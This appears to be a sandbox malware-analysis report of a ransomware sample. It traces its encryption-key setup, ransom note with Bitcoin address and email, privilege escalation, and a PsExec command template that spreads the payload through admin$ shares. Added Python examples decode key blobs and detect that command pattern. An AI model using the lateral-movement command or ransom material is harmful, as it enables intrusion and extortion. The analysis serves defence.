                                                  • Part of subcall function 02E51BA0: LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,02E51D43,?), ref: 02E51BD6
                                                  • Part of subcall function 02E51BA0: CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BF8
                                                  • Part of subcall function 02E51BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,02E51D43), ref: 02E51C1A
                                                  • Part of subcall function 02E51BA0: LocalAlloc.KERNEL32(00000040,02E51D43,?,?,?,02E51D43,?), ref: 02E51C25
                                                  • Part of subcall function 02E51BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,02E51D43), ref: 02E51C42
                                                  • Part of subcall function 02E51BA0: CryptImportKey.ADVAPI32(5708458B,?,02E51D43,00000000,00000000,02E51D4F,?,?,?,02E51D43,?), ref: 02E51C5A
                                                  • Part of subcall function 02E51BA0: LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C66
                                                  • Part of subcall function 02E51BA0: LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C6F
                                                  • Part of subcall function 02E51C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,02E51D54,F0000000,?), ref: 02E51CA6
                                                  • Part of subcall function 02E51C7F: LocalAlloc.KERNEL32(00000040,?,?,02E51D54,F0000000,?), ref: 02E51CB1
                                                  • Part of subcall function 02E51C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,02E51D54,F0000000,?), ref: 02E51CCC
                                                  • Part of subcall function 02E51C7F: CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51CE8
                                                  • Part of subcall function 02E51C7F: LocalAlloc.KERNEL32(00000040,F0000000,?,02E51D54,F0000000,?), ref: 02E51CF6
                                                  • Part of subcall function 02E51C7F: CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51D0F
                                                  • Part of subcall function 02E51C7F: LocalFree.KERNEL32(02E51D54,?,02E51D54,F0000000,?), ref: 02E51D24
                                                • PathCombineW.SHLWAPI(?,?,README.TXT,F0000000,?), ref: 02E51D70
                                                • LocalFree.KERNEL32(?), ref: 02E51E46
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • Sleep.KERNEL32(-00000001), ref: 02E51D8F
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 02E51DA8
                                                • WriteFile.KERNEL32(00000000,Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b,00000432,?,00000000,?), ref: 02E51DD3
                                                • WriteFile.KERNEL32(00000000,1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX,0000004C,?,00000000), ref: 02E51DE2
                                                • WriteFile.KERNEL32(00000000,2.Send your Bitcoin wallet ID and personal installation key to e-mail ,0000008E,?,00000000), ref: 02E51DF4
                                                • WriteFile.KERNEL32(00000000,flinfarcconbio1975,00000038,?,00000000), ref: 02E51E03
                                                • WriteFile.KERNEL32(00000000,Your personal installation key:,00000048,?,00000000), ref: 02E51E12
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02E51E35
                                                • CloseHandle.KERNEL32(00000000), ref: 02E51E38
                                                Strings
                                                • 2.Send your Bitcoin wallet ID and personal installation key to e-mail , xrefs: 02E51DEE
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51D95
                                                • Your personal installation key:, xrefs: 02E51E0C
                                                • flinfarcconbio1975, xrefs: 02E51DFD
                                                • README.TXT, xrefs: 02E51D61
                                                • Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b, xrefs: 02E51DCA
                                                • 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX, xrefs: 02E51DDC
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Local$File$Write$AllocBinaryFreeString$DecodeExportObject$CloseCombineCountCreateHandleImportPathSleepTick
                                                • String ID: Your personal installation key:$1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX$2.Send your Bitcoin wallet ID and personal installation key to e-mail $Microsoft Enhanced RSA and AES Cryptographic Provider$Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b$README.TXT$flinfarcconbio1975
                                                • API String ID: 3272514228-3166512299
                                                • Opcode ID: 3a0337d54de25562f6d28d2804fe48e8e4a8fdc202a88658abf323bbdb20cd78
                                                • Instruction ID: 216739bb48c4afb7d895d130fe063ec5e6ab67fc5571f822e796e8bccd41eea5
                                                • Opcode Fuzzy Hash: 3a0337d54de25562f6d28d2804fe48e8e4a8fdc202a88658abf323bbdb20cd78
                                                • Instruction Fuzzy Hash: F63108759D0228BAEB209BA5CC49EEF7FBDEB89740F009455B905E6041DBB0DA40CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%
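The three CryptoAPI stages in the subcalls listed above (CryptStringToBinaryW with flag 1, CRYPT_STRING_BASE64; CryptDecodeObjectEx with structure type 0x13, RSA_CSP_PUBLICKEYBLOB; CryptExportKey with blob type 1, SIMPLEBLOB, followed by CryptBinaryToStringW in base64) are what turn the embedded RSA public key into the base64 "personal installation key" appended to README.TXT: an AES session key is exported wrapped under the attacker's RSA key, so only the holder of the private key can recover it. The Python below is an added example, not code from the sample or from Joe Sandbox. It re-implements those three conversions so the blobs can be inspected offline. The 128-bit key and the SIMPLEBLOB are constructed toy values (the sample's real key is only shown truncated above); CALG_AES_128 as the session-key algorithm is an assumption, since the report does not show it, and the parser simply reports whatever ALG_IDs the header carries.

```python
r"""Decode the CryptoAPI blobs behind the README.TXT 'personal installation key'.

Added example, not code from the sample or from Joe Sandbox.  Mirrors in pure Python:
  CryptStringToBinaryW(CRYPT_STRING_BASE64)        base64 text -> DER
  CryptDecodeObjectEx(RSA_CSP_PUBLICKEYBLOB, 0x13) DER RSAPublicKey -> CSP PUBLICKEYBLOB
  CryptExportKey(hSessionKey, hRsaPub, SIMPLEBLOB) SIMPLEBLOB, base64'd into README.TXT
The RSA key and the SIMPLEBLOB at the bottom are constructed toy values.
"""
import base64
import struct

# CryptoAPI constants (wincrypt.h)
PUBLICKEYBLOB = 0x06
SIMPLEBLOB = 0x01
CUR_BLOB_VERSION = 2
CALG_RSA_KEYX = 0x0000A400
CALG_AES_128 = 0x0000660E      # assumed session-key algorithm for the constructed sample
RSA1_MAGIC = 0x31415352        # 'RSA1' as a little-endian DWORD


def _der_len(n):
    if n < 0x80:
        return bytes([n])
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(lb)]) + lb


def _der_int(v):
    b = v.to_bytes((v.bit_length() + 8) // 8, "big")   # keeps a leading 0x00 when the top bit is set
    return b"\x02" + _der_len(len(b)) + b


def encode_rsa_public_key_der(n, e):
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    body = _der_int(n) + _der_int(e)
    return b"\x30" + _der_len(len(body)) + body


def _der_read(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key_der(der):
    """What CryptDecodeObjectEx(RSA_CSP_PUBLICKEYBLOB) parses: returns (n, e)."""
    tag, body, _ = _der_read(der, 0)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    t1, n_bytes, pos = _der_read(body, 0)
    t2, e_bytes, _ = _der_read(body, pos)
    if t1 != 0x02 or t2 != 0x02:
        raise ValueError("expected two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def crypt_string_to_binary(text):
    """CryptStringToBinaryW(..., CRYPT_STRING_BASE64): ignore whitespace, decode base64."""
    return base64.b64decode("".join(text.split()))


def der_to_base64(der):
    return base64.b64encode(der).decode()


def to_csp_publickeyblob(n, e):
    """Build the PUBLICKEYBLOB that CryptImportKey consumes: BLOBHEADER + RSAPUBKEY + modulus LE."""
    bitlen = ((n.bit_length() + 7) // 8) * 8
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapubkey = struct.pack("<III", RSA1_MAGIC, bitlen, e)
    return header + rsapubkey + n.to_bytes(bitlen // 8, "little")


def parse_csp_publickeyblob(blob):
    btype, _ver, _reserved, alg, magic, bitlen, e = struct.unpack_from("<BBHIIII", blob, 0)
    if btype != PUBLICKEYBLOB or magic != RSA1_MAGIC:
        raise ValueError("not an RSA PUBLICKEYBLOB")
    n = int.from_bytes(blob[20:20 + bitlen // 8], "little")
    return {"alg": alg, "bits": bitlen, "e": e, "n": n}


def parse_installation_key(b64_text):
    """Parse the base64 SIMPLEBLOB written after 'Your personal installation key:'.

    Layout: BLOBHEADER{bType=SIMPLEBLOB, bVersion, reserved, aiKeyAlg = session-key alg},
            ALG_ID aiEncAlg (key-exchange alg that wrapped it), then the wrapped key,
            little-endian, one RSA block long.  Nothing here can be decrypted without
            the attacker's private key; the point is triage of what the note contains.
    """
    blob = crypt_string_to_binary(b64_text)
    btype, _ver, _reserved, key_alg, enc_alg = struct.unpack_from("<BBHII", blob, 0)
    if btype != SIMPLEBLOB:
        raise ValueError("not a SIMPLEBLOB")
    wrapped = blob[12:]
    return {"session_alg": key_alg, "wrap_alg": enc_alg, "rsa_bits": len(wrapped) * 8}


# Constructed sample data: a toy 128-bit modulus (not a real RSA key) and a fake SIMPLEBLOB.
TOY_N = 0xB8F2C1D4E5A69780123456789ABCDEF1
TOY_E = 65537
TOY_PUBKEY_B64 = der_to_base64(encode_rsa_public_key_der(TOY_N, TOY_E))
TOY_INSTALL_KEY = base64.b64encode(
    struct.pack("<BBHII", SIMPLEBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128, CALG_RSA_KEYX)
    + bytes(range(256))          # stands in for a 2048-bit RSA-wrapped AES key
).decode()

if __name__ == "__main__":
    n, e = parse_rsa_public_key_der(crypt_string_to_binary(TOY_PUBKEY_B64))
    print(parse_csp_publickeyblob(to_csp_publickeyblob(n, e)))
    print(parse_installation_key(TOY_INSTALL_KEY))
```

A 2048-bit modulus encoded this way starts with the DER bytes 30 82 01 0A 02 82 01 01 00, which is the base64 prefix MIIBCgKCAQEA visible in the CryptStringToBinaryW argument above; that prefix alone identifies the embedded string as a PKCS#1 RSAPublicKey of 2048 bits.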

                                                APIs
                                                • memset.MSVCRT ref: 02E5878C
                                                  • Part of subcall function 02E58494: memset.MSVCRT ref: 02E584AD
                                                  • Part of subcall function 02E58494: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 02E584C6
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02E587A4
                                                • Process32FirstW.KERNEL32 ref: 02E587C5
                                                • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 02E587FF
                                                • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 02E58818
                                                • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenSessionId),?,00000004,?), ref: 02E5883E
                                                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 02E58867
                                                • memset.MSVCRT ref: 02E5887D
                                                • GetTokenInformation.ADVAPI32(?,0000000A(TokenStatistics),?,00000038,?,?,00000000,?), ref: 02E58897
                                                • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 02E588C6
                                                • CloseHandle.KERNEL32(?), ref: 02E58901
                                                • CloseHandle.KERNEL32(?), ref: 02E58907
                                                • Process32NextW.KERNEL32(?,?), ref: 02E58919
                                                • GetLastError.KERNEL32 ref: 02E58929
                                                • CloseHandle.KERNEL32(?), ref: 02E58933
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                • String ID: @
                                                • API String ID: 4137997400-2766056989
                                                • Opcode ID: b31adf649323a0fd3e0a72ce0c7d1c3def22c6910132095ebab85d24b38a8ac0
                                                • Instruction ID: 501541ed7258788a01c8a83f1be652f3e6b639a311782e700d154dd7b2af130c
                                                • Opcode Fuzzy Hash: b31adf649323a0fd3e0a72ce0c7d1c3def22c6910132095ebab85d24b38a8ac0
                                                • Instruction Fuzzy Hash: 15515B71598361AFE320DF25CC48A6BBBE8FF88758F445A2DF994D2190D730C985CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 02E57CCB
                                                  • Part of subcall function 02E581BA: GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 02E581DE
                                                  • Part of subcall function 02E581BA: OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 02E581E5
                                                  • Part of subcall function 02E581BA: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 02E581F7
                                                  • Part of subcall function 02E581BA: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02E5821A
                                                  • Part of subcall function 02E581BA: GetLastError.KERNEL32(?,00000000), ref: 02E58222
                                                  • Part of subcall function 02E581BA: SetLastError.KERNEL32(?,?,00000000), ref: 02E58234
                                                • GetModuleFileNameW.KERNEL32(C:\Windows\dllcm.dat,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,02E57E00), ref: 02E57D27
                                                • CreateFileW.KERNEL32(C:\Windows\dllcm.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02E58AEC
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 02E58AFD
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B0C
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E58B13
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02E58B2C
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B3D
                                                • HeapFree.KERNEL32(00000000), ref: 02E58B44
                                                • CloseHandle.KERNEL32(?), ref: 02E58B63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHeapProcess$ErrorLastToken$AdjustAllocCloseCountCreateCurrentFreeHandleLookupModuleNameOpenPrivilegePrivilegesReadSizeTickValue
                                                • String ID: C:\Windows\dllcm.dat$SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                • API String ID: 3788613323-3655906534
                                                • Opcode ID: aabb8b93dbbdbbbae31252b7e23d93605cc3c7fc63707e5a3b2f61ff21937eea
                                                • Instruction ID: b881973bd2129d80ebf06862d8ba564335eae8c60fc9b9c0a2ad9143f34fac43
                                                • Opcode Fuzzy Hash: aabb8b93dbbdbbbae31252b7e23d93605cc3c7fc63707e5a3b2f61ff21937eea
                                                • Instruction Fuzzy Hash: 80319370DE0334ABDB21AB66AD4DEAB7F6DAB49795B40A815FC02E2141D77045D0CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 02E58BE0
                                                • OpenThreadToken.ADVAPI32(00000000), ref: 02E58BE7
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 02E58C09
                                                • GetLastError.KERNEL32 ref: 02E58C1A
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 02E58C2B
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 02E58C44
                                                • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 02E58C5B
                                                • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 02E58C6E
                                                • GetLastError.KERNEL32 ref: 02E58C99
                                                • GlobalFree.KERNEL32(00000000), ref: 02E58C9C
                                                • GetLastError.KERNEL32 ref: 02E58CA4
                                                • CloseHandle.KERNEL32(?), ref: 02E58CAB
                                                • GetLastError.KERNEL32 ref: 02E58CB3
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                • String ID:
                                                • API String ID: 1283781744-0
                                                • Opcode ID: f1398fb25f2f9ede8d18e4140e47865d8af48e3a85d23ff0fceffc2e8e20e1e0
                                                • Instruction ID: c9dacd392abb39ded89d88ac17bbc6a7b9c8ca3655afda440514742e2641fb51
                                                • Opcode Fuzzy Hash: f1398fb25f2f9ede8d18e4140e47865d8af48e3a85d23ff0fceffc2e8e20e1e0
                                                • Instruction Fuzzy Hash: 08318935DE2234EBEB20DBA2DD88BEE7B79EF04708F509450EA00A2050C73199D1CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000,?,?,?), ref: 02E56D1D
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56D26
                                                • memcpy.MSVCRT ref: 02E56D53
                                                • GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 02E56D78
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56D7B
                                                • memcpy.MSVCRT ref: 02E56DAA
                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02E56DC7
                                                • HeapFree.KERNEL32(00000000), ref: 02E56DCA
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E56DD1
                                                • HeapFree.KERNEL32(00000000), ref: 02E56DD4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Process$AllocFreememcpy
                                                • String ID: \\%ws\admin$\%ws
                                                • API String ID: 3405790324-2640736851
                                                • Opcode ID: c4154b0bd360b78e90f34a1ab09c9cb831d371530ff14d4b5f250428d6e38431
                                                • Instruction ID: 2cb54c013905975b56c790c759767278883df88b0b1a8857085d34dc330597db
                                                • Opcode Fuzzy Hash: c4154b0bd360b78e90f34a1ab09c9cb831d371530ff14d4b5f250428d6e38431
                                                • Instruction Fuzzy Hash: 6831B17591011AAFCB00EFA9CC45EAF7BB9EF48344F458855ED04CB251EB70EA14CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E58B70: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,?,?,02E59A11), ref: 02E58B80
                                                • SetLastError.KERNEL32(00000003,?,00000001,75BF73E0,?,02E59BEB,?), ref: 02E59821
                                                • PathFileExistsW.SHLWAPI(?,?,02E59BEB,?), ref: 02E5982C
                                                • wsprintfW.USER32 ref: 02E59846
                                                • wsprintfW.USER32 ref: 02E5985A
                                                • memcpy.MSVCRT ref: 02E59889
                                                Strings
                                                • z, xrefs: 02E5980E
                                                • %s \\%s -accepteula -s , xrefs: 02E59840
                                                • -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 , xrefs: 02E59854
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FilePathwsprintf$ErrorExistsFindLastNamememcpy
                                                • String ID: %s \\%s -accepteula -s $-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 $z
                                                • API String ID: 374144278-3863528809
                                                • Opcode ID: 450bbcdab3799ca5580851961b8132f849c1ca579855226106011a9e87a66110
                                                • Instruction ID: 678ca21941c50f0d87b12ecc7c389778b22ae11f1ba90b0b5be669e386bd79e2
                                                • Opcode Fuzzy Hash: 450bbcdab3799ca5580851961b8132f849c1ca579855226106011a9e87a66110
                                                • Instruction Fuzzy Hash: 1231C872AA0224DBCB20DF64DC44AEE73B9AF54344F0495A6E806D7211EB78D681CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%
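The two format strings in this function and in the admin$ path builder above it (`%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 ` and `\\%ws\admin$\%ws`) describe the lateral-movement step: the payload is copied into the target's administrative share and started there through PsExec as a SYSTEM service (-s) without waiting for it (-d), with rundll32 invoking the payload's ordinal export #1. The Python below is an added example, not code from the sample or from Joe Sandbox. It turns both strings into detection rules and runs them over a handful of constructed process-creation and file-creation events; the tool path C:\Windows\svc.dat, the host names and the event shape are placeholders, while dllcm.dat is the module name this report records for the sample.

```python
r"""Hunt for the lateral-movement command line and admin$ drop seen in this report.

Added example, not code from the sample or from Joe Sandbox.  The two patterns are
reconstructed from the strings in the report:
  '%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 '
  '\\%ws\admin$\%ws'
Event shape, host names and the tool path below are made up for the demo.
"""
import re

# PsExec-style launch of a payload under C:\Windows through rundll32 by ordinal #1.
PSEXEC_RUNDLL32_RE = re.compile(
    r'^(?P<tool>"[^"]+"|\S+)\s+\\\\(?P<target>[^\s\\]+)\s+-accepteula\s+-s\s+-d\s+'
    r'C:\\Windows\\System32\\rundll32\.exe\s+"C:\\Windows\\(?P<payload>[^"\\]+)",#1\s*$',
    re.IGNORECASE,
)
# Generic: rundll32 calling an export by ordinal from a file that is not a .dll.
RUNDLL32_ORDINAL_RE = re.compile(
    r'rundll32\.exe\s+"?(?P<path>[^",]+?)"?,#(?P<ordinal>\d+)', re.IGNORECASE
)
# Write into the administrative share of another host.
ADMIN_SHARE_RE = re.compile(
    r'^\\\\(?P<target>[^\\]+)\\admin\$\\(?P<file>[^\\]+)$', re.IGNORECASE
)


def check_process_event(host, cmdline):
    """Return a finding dict for a suspicious command line, else None."""
    m = PSEXEC_RUNDLL32_RE.match(cmdline)
    if m:
        return {"rule": "psexec_rundll32_ordinal_launch", "host": host,
                "target": m.group("target"), "payload": m.group("payload"),
                "tool": m.group("tool")}
    m = RUNDLL32_ORDINAL_RE.search(cmdline)
    if m and not m.group("path").lower().endswith(".dll"):
        return {"rule": "rundll32_ordinal_non_dll", "host": host,
                "path": m.group("path"), "ordinal": int(m.group("ordinal"))}
    return None


def check_file_event(host, path):
    """Flag writes to \\<other host>\admin$\<file>; the local host's own share is ignored."""
    m = ADMIN_SHARE_RE.match(path)
    if m and m.group("target").lower() not in ("localhost", "127.0.0.1", host.lower()):
        return {"rule": "admin_share_drop", "host": host,
                "target": m.group("target"), "file": m.group("file")}
    return None


def scan_events(events):
    """events: iterable of {"type": "process"|"file", "host": ..., "cmdline"|"path": ...}."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            hit = check_process_event(ev["host"], ev["cmdline"])
        else:
            hit = check_file_event(ev["host"], ev["path"])
        if hit:
            hits.append(hit)
    return hits


# Constructed sample telemetry.  svc.dat, the hosts and 10.0.0.7 are placeholders;
# dllcm.dat is the module name recorded for this sample in the report.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01",
     "cmdline": r'C:\Windows\svc.dat \\10.0.0.7 -accepteula -s -d '
                r'C:\Windows\System32\rundll32.exe "C:\Windows\dllcm.dat",#1 '},
    {"type": "process", "host": "WS01",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"type": "process", "host": "WS02",
     "cmdline": r'C:\Windows\System32\rundll32.exe "C:\Windows\dllcm.dat",#1'},
    {"type": "process", "host": "WS02",
     "cmdline": r"C:\Windows\System32\rundll32.exe shell32.dll,#61"},   # benign ordinal call
    {"type": "file", "host": "WS01", "path": r"\\10.0.0.7\admin$\dllcm.dat"},
    {"type": "file", "host": "WS01", "path": r"\\fileserver\share\report.docx"},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit)
```

The first rule is specific to this command-line shape; the second and third are the broader behaviours worth alerting on even when the tool name changes: rundll32 loading a non-.dll file by ordinal, and a workstation writing files into another host's admin$ share. Both need process creation with full command lines (Sysmon Event ID 1 or 4688 with command-line auditing) and file-share access logging (Sysmon Event ID 11 on the source or 5145 on the target) to be collected.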

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 02E56E15
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56E1E
                                                • memcpy.MSVCRT ref: 02E56E4B
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02E56E6F
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56E72
                                                • memcpy.MSVCRT ref: 02E56EA1
                                                • GetProcessHeap.KERNEL32(00000000,?,02CD5F60,?,?), ref: 02E56EC1
                                                • HeapFree.KERNEL32(00000000), ref: 02E56EC4
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E56ECB
                                                • HeapFree.KERNEL32(00000000), ref: 02E56ECE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
